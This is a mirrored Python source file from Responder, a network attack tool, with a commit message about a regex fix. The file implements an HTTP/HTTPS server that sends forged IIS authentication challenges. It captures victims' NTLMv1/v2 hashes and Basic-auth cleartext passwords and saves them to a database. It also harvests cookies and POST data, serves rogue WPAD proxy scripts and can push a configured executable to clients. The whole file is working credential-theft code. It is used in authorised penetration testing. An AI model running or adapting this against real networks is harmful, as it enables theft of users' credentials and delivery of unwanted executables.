mirror of
https://github.com/lgandx/Responder.git
synced 2025-12-06 12:41:31 +00:00
The \r was escaped inside a character class where it did not need to be. Instead of the search stopping at the first \r as intended, it stopped at the first literal r (which can occur in normal b64 content) or the first literal \ (unlikely to occur in HTTP headers in general). The \\ has been there since the very first commit of Responder in 2013.
269 lines
8.6 KiB
Python
269 lines
8.6 KiB
Python
#!/usr/bin/env python
|
|
# This file is part of Responder
|
|
# Original work by Laurent Gaffie - Trustwave Holdings
|
|
#
|
|
# This program is free software: you can redistribute it and/or modify
|
|
# it under the terms of the GNU General Public License as published by
|
|
# the Free Software Foundation, either version 3 of the License, or
|
|
# (at your option) any later version.
|
|
#
|
|
# This program is distributed in the hope that it will be useful,
|
|
# but WITHOUT ANY WARRANTY; without even the implied warranty of
|
|
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
|
# GNU General Public License for more details.
|
|
#
|
|
# You should have received a copy of the GNU General Public License
|
|
# along with this program. If not, see <http://www.gnu.org/licenses/>.
|
|
|
|
from SocketServer import BaseRequestHandler, StreamRequestHandler
|
|
from base64 import b64decode
|
|
import struct
|
|
from utils import *
|
|
|
|
from packets import NTLM_Challenge
|
|
from packets import IIS_Auth_401_Ans, IIS_Auth_Granted, IIS_NTLM_Challenge_Ans, IIS_Basic_401_Ans
|
|
from packets import WPADScript, ServeExeFile, ServeHtmlFile
|
|
|
|
|
|
# Parse NTLMv1/v2 hash.
|
|
def ParseHTTPHash(data, client):
|
|
LMhashLen = struct.unpack('<H',data[12:14])[0]
|
|
LMhashOffset = struct.unpack('<H',data[16:18])[0]
|
|
LMHash = data[LMhashOffset:LMhashOffset+LMhashLen].encode("hex").upper()
|
|
|
|
NthashLen = struct.unpack('<H',data[20:22])[0]
|
|
NthashOffset = struct.unpack('<H',data[24:26])[0]
|
|
NTHash = data[NthashOffset:NthashOffset+NthashLen].encode("hex").upper()
|
|
|
|
UserLen = struct.unpack('<H',data[36:38])[0]
|
|
UserOffset = struct.unpack('<H',data[40:42])[0]
|
|
User = data[UserOffset:UserOffset+UserLen].replace('\x00','')
|
|
|
|
if NthashLen == 24:
|
|
HostNameLen = struct.unpack('<H',data[46:48])[0]
|
|
HostNameOffset = struct.unpack('<H',data[48:50])[0]
|
|
HostName = data[HostNameOffset:HostNameOffset+HostNameLen].replace('\x00','')
|
|
WriteHash = '%s::%s:%s:%s:%s' % (User, HostName, LMHash, NTHash, settings.Config.NumChal)
|
|
|
|
SaveToDb({
|
|
'module': 'HTTP',
|
|
'type': 'NTLMv1',
|
|
'client': client,
|
|
'host': HostName,
|
|
'user': User,
|
|
'hash': LMHash+":"+NTHash,
|
|
'fullhash': WriteHash,
|
|
})
|
|
|
|
if NthashLen > 24:
|
|
NthashLen = 64
|
|
DomainLen = struct.unpack('<H',data[28:30])[0]
|
|
DomainOffset = struct.unpack('<H',data[32:34])[0]
|
|
Domain = data[DomainOffset:DomainOffset+DomainLen].replace('\x00','')
|
|
HostNameLen = struct.unpack('<H',data[44:46])[0]
|
|
HostNameOffset = struct.unpack('<H',data[48:50])[0]
|
|
HostName = data[HostNameOffset:HostNameOffset+HostNameLen].replace('\x00','')
|
|
WriteHash = '%s::%s:%s:%s:%s' % (User, Domain, settings.Config.NumChal, NTHash[:32], NTHash[32:])
|
|
|
|
SaveToDb({
|
|
'module': 'HTTP',
|
|
'type': 'NTLMv2',
|
|
'client': client,
|
|
'host': HostName,
|
|
'user': Domain + '\\' + User,
|
|
'hash': NTHash[:32] + ":" + NTHash[32:],
|
|
'fullhash': WriteHash,
|
|
})
|
|
|
|
def GrabCookie(data, host):
|
|
Cookie = re.search(r'(Cookie:*.\=*)[^\r\n]*', data)
|
|
|
|
if Cookie:
|
|
Cookie = Cookie.group(0).replace('Cookie: ', '')
|
|
if len(Cookie) > 1 and settings.Config.Verbose:
|
|
print text("[HTTP] Cookie : %s " % Cookie)
|
|
return Cookie
|
|
return False
|
|
|
|
def GrabHost(data, host):
|
|
Host = re.search(r'(Host:*.\=*)[^\r\n]*', data)
|
|
|
|
if Host:
|
|
Host = Host.group(0).replace('Host: ', '')
|
|
if settings.Config.Verbose:
|
|
print text("[HTTP] Host : %s " % color(Host, 3))
|
|
return Host
|
|
return False
|
|
|
|
def GrabReferer(data, host):
|
|
Referer = re.search(r'(Referer:*.\=*)[^\r\n]*', data)
|
|
|
|
if Referer:
|
|
Referer = Referer.group(0).replace('Referer: ', '')
|
|
if settings.Config.Verbose:
|
|
print text("[HTTP] Referer : %s " % color(Referer, 3))
|
|
return Referer
|
|
return False
|
|
|
|
def WpadCustom(data, client):
|
|
Wpad = re.search(r'(/wpad.dat|/*\.pac)', data)
|
|
if Wpad:
|
|
Buffer = WPADScript(Payload=settings.Config.WPAD_Script)
|
|
Buffer.calculate()
|
|
return str(Buffer)
|
|
return False
|
|
|
|
def ServeFile(Filename):
|
|
with open (Filename, "rb") as bk:
|
|
return bk.read()
|
|
|
|
def RespondWithFile(client, filename, dlname=None):
|
|
|
|
if filename.endswith('.exe'):
|
|
Buffer = ServeExeFile(Payload = ServeFile(filename), ContentDiFile=dlname)
|
|
else:
|
|
Buffer = ServeHtmlFile(Payload = ServeFile(filename))
|
|
|
|
Buffer.calculate()
|
|
print text("[HTTP] Sending file %s to %s" % (filename, client))
|
|
|
|
return str(Buffer)
|
|
|
|
def GrabURL(data, host):
|
|
GET = re.findall(r'(?<=GET )[^HTTP]*', data)
|
|
POST = re.findall(r'(?<=POST )[^HTTP]*', data)
|
|
POSTDATA = re.findall(r'(?<=\r\n\r\n)[^*]*', data)
|
|
|
|
if GET and settings.Config.Verbose:
|
|
print text("[HTTP] GET request from: %-15s URL: %s" % (host, color(''.join(GET), 5)))
|
|
|
|
if POST and settings.Config.Verbose:
|
|
print text("[HTTP] POST request from: %-15s URL: %s" % (host, color(''.join(POST), 5)))
|
|
if len(''.join(POSTDATA)) > 2:
|
|
print text("[HTTP] POST Data: %s" % ''.join(POSTDATA).strip())
|
|
|
|
# Handle HTTP packet sequence.
|
|
def PacketSequence(data, client):
|
|
NTLM_Auth = re.findall(r'(?<=Authorization: NTLM )[^\r]*', data)
|
|
Basic_Auth = re.findall(r'(?<=Authorization: Basic )[^\r]*', data)
|
|
|
|
# Serve the .exe if needed
|
|
if settings.Config.Serve_Always is True or (settings.Config.Serve_Exe is True and re.findall('.exe', data)):
|
|
return RespondWithFile(client, settings.Config.Exe_Filename, settings.Config.Exe_DlName)
|
|
|
|
# Serve the custom HTML if needed
|
|
if settings.Config.Serve_Html:
|
|
return RespondWithFile(client, settings.Config.Html_Filename)
|
|
|
|
WPAD_Custom = WpadCustom(data, client)
|
|
|
|
if NTLM_Auth:
|
|
Packet_NTLM = b64decode(''.join(NTLM_Auth))[8:9]
|
|
|
|
if Packet_NTLM == "\x01":
|
|
GrabURL(data, client)
|
|
GrabReferer(data, client)
|
|
GrabHost(data, client)
|
|
GrabCookie(data, client)
|
|
|
|
Buffer = NTLM_Challenge(ServerChallenge=settings.Config.Challenge)
|
|
Buffer.calculate()
|
|
|
|
Buffer_Ans = IIS_NTLM_Challenge_Ans()
|
|
Buffer_Ans.calculate(str(Buffer))
|
|
|
|
return str(Buffer_Ans)
|
|
|
|
if Packet_NTLM == "\x03":
|
|
NTLM_Auth = b64decode(''.join(NTLM_Auth))
|
|
ParseHTTPHash(NTLM_Auth, client)
|
|
|
|
if settings.Config.Force_WPAD_Auth and WPAD_Custom:
|
|
print text("[HTTP] WPAD (auth) file sent to %s" % client)
|
|
return WPAD_Custom
|
|
else:
|
|
Buffer = IIS_Auth_Granted(Payload=settings.Config.HtmlToInject)
|
|
Buffer.calculate()
|
|
return str(Buffer)
|
|
|
|
elif Basic_Auth:
|
|
ClearText_Auth = b64decode(''.join(Basic_Auth))
|
|
|
|
GrabURL(data, client)
|
|
GrabReferer(data, client)
|
|
GrabHost(data, client)
|
|
GrabCookie(data, client)
|
|
|
|
SaveToDb({
|
|
'module': 'HTTP',
|
|
'type': 'Basic',
|
|
'client': client,
|
|
'user': ClearText_Auth.split(':')[0],
|
|
'cleartext': ClearText_Auth.split(':')[1],
|
|
})
|
|
|
|
if settings.Config.Force_WPAD_Auth and WPAD_Custom:
|
|
if settings.Config.Verbose:
|
|
print text("[HTTP] WPAD (auth) file sent to %s" % client)
|
|
return WPAD_Custom
|
|
else:
|
|
Buffer = IIS_Auth_Granted(Payload=settings.Config.HtmlToInject)
|
|
Buffer.calculate()
|
|
return str(Buffer)
|
|
else:
|
|
if settings.Config.Basic:
|
|
Response = IIS_Basic_401_Ans()
|
|
if settings.Config.Verbose:
|
|
print text("[HTTP] Sending BASIC authentication request to %s" % client)
|
|
else:
|
|
Response = IIS_Auth_401_Ans()
|
|
if settings.Config.Verbose:
|
|
print text("[HTTP] Sending NTLM authentication request to %s" % client)
|
|
return str(Response)
|
|
|
|
# HTTP Server class
|
|
class HTTP(BaseRequestHandler):
|
|
def handle(self):
|
|
try:
|
|
while True:
|
|
self.request.settimeout(1)
|
|
data = self.request.recv(8092)
|
|
Buffer = WpadCustom(data, self.client_address[0])
|
|
|
|
if Buffer and settings.Config.Force_WPAD_Auth == False:
|
|
self.request.send(Buffer)
|
|
if settings.Config.Verbose:
|
|
print text("[HTTP] WPAD (no auth) file sent to %s" % self.client_address[0])
|
|
|
|
else:
|
|
Buffer = PacketSequence(data,self.client_address[0])
|
|
self.request.send(Buffer)
|
|
except socket.error:
|
|
pass
|
|
|
|
# HTTPS Server class
|
|
class HTTPS(StreamRequestHandler):
|
|
def setup(self):
|
|
self.exchange = self.request
|
|
self.rfile = socket._fileobject(self.request, "rb", self.rbufsize)
|
|
self.wfile = socket._fileobject(self.request, "wb", self.wbufsize)
|
|
|
|
def handle(self):
|
|
try:
|
|
while True:
|
|
data = self.exchange.recv(8092)
|
|
self.exchange.settimeout(0.5)
|
|
Buffer = WpadCustom(data,self.client_address[0])
|
|
|
|
if Buffer and settings.Config.Force_WPAD_Auth == False:
|
|
self.exchange.send(Buffer)
|
|
if settings.Config.Verbose:
|
|
print text("[HTTPS] WPAD (no auth) file sent to %s" % self.client_address[0])
|
|
|
|
else:
|
|
Buffer = PacketSequence(data,self.client_address[0])
|
|
self.exchange.send(Buffer)
|
|
except:
|
|
pass
|
|
|